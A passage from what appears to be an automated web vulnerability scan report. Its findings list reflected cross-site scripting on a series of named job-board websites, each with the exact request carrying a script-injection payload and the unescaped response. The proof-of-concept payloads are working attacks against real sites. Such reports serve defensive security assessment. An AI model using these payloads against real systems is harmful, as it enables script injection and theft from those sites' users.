Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104462

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.nursingcrossing.com/?3e967"><script>alert(1)</script>7f175de2ffb=1">
...[SNIP]...

3.90. http://www.occupationaltherapycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.occupationaltherapycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718c9"><script>alert(1)</script>ed54ab267f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?718c9"><script>alert(1)</script>ed54ab267f0=1 HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ntth3d6lgao3t4tjcnm0jeuoa2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106559

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.occupationaltherapycrossing.com/?718c9"><script>alert(1)</script>ed54ab267f0=1">
...[SNIP]...

3.91. http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.operationscrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43e7"><script>alert(1)</script>39abb463529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c43e7"><script>alert(1)</script>39abb463529=1 HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:08 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vmuk5k202atl7l2lqpceah52g3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118202

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.operationscrossing.com/?c43e7"><script>alert(1)</script>39abb463529=1">
...[SNIP]...

3.92. http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parttimecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74114"><script>alert(1)</script>f6783053e84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?74114"><script>alert(1)</script>f6783053e84=1 HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:19 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=autgq8pu824jrji4an8ujk4c15; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110622

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.parttimecrossing.com/?74114"><script>alert(1)</script>f6783053e84=1">
...[SNIP]...

3.93. http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pharmaceuticalcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b38"><script>alert(1)</script>ef57d7684ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?20b38"><script>alert(1)</script>ef57d7684ea=1 HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mihqustv5smd5unl99nhgf6ie2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119527

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.pharmaceuticalcrossing.com/?20b38"><script>alert(1)</script>ef57d7684ea=1">
...[SNIP]...

3.94. http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.physicalsecuritycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587a0"><script>alert(1)</script>15ac57f2af2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?587a0"><script>alert(1)</script>15ac57f2af2=1 HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6n27njhk9iq46bh77j2bk4h5b3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107084

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.physicalsecuritycrossing.com/?587a0"><script>alert(1)</script>15ac57f2af2=1">
...[SNIP]...

3.95. http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.physicaltherapycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1b8"><script>alert(1)</script>a05ed2ff752 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a1b8"><script>alert(1)</script>a05ed2ff752=1 HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a8c9mu27mlnqa553k64g321h72; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116184

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.physicaltherapycrossing.com/?4a1b8"><script>alert(1)</script>a05ed2ff752=1">
...[SNIP]...

3.96. http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.planningcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131dd"><script>alert(1)</script>32e79ab8991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?131dd"><script>alert(1)</script>32e79ab8991=1 HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j7ia85hmb3rcq7tsq3p6afa6j6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108746

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.planningcrossing.com/?131dd"><script>alert(1)</script>32e79ab8991=1">
...[SNIP]...

3.97. http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.postdoctoralfellowcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26245"><script>alert(1)</script>d6a7726482b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?26245"><script>alert(1)</script>d6a7726482b=1 HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qpc1ersq5h9qncti1rg1u4rc74; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.postdoctoralfellowcrossing.com/?26245"><script>alert(1)</script>d6a7726482b=1">
...[SNIP]...

3.98. http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.prcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18964"><script>alert(1)</script>b19a0aa290b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?18964"><script>alert(1)</script>b19a0aa290b=1 HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6orf3teb9u7v31k70a8nmlrc21; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120233

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.prcrossing.com/?18964"><script>alert(1)</script>b19a0aa290b=1">
...[SNIP]...

3.99. http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.procurementcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e82f"><script>alert(1)</script>c07e8b35600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4e82f"><script>alert(1)</script>c07e8b35600=1 HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jse3n83urq36atc979iv0ro2j3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101054

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.procurementcrossing.com/?4e82f"><script>alert(1)</script>c07e8b35600=1">
...[SNIP]...

3.100. http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.productmanagercrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 103c3"><script>alert(1)</script>96ed62da7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?103c3"><script>alert(1)</script>96ed62da7e5=1 HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6b3lghgc54sic7k9tq5ivitvo7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106239

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.productmanagercrossing.com/?103c3"><script>alert(1)</script>96ed62da7e5=1">
...[SNIP]...

3.101. http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.projectmanagementcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3757"><script>alert(1)</script>8ec40ce5596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f3757"><script>alert(1)</script>8ec40ce5596=1 HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=07nflqvoiopran8iob1ldegr20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.projectmanagementcrossing.com/?f3757"><script>alert(1)</script>8ec40ce5596=1">
...[SNIP]...

3.102. http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.publicinterestcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c3"><script>alert(1)</script>0be37d14be6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?446c3"><script>alert(1)</script>0be37d14be6=1 HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tto0bf5j0sbrt1q0tufjnj4kr7; path=/
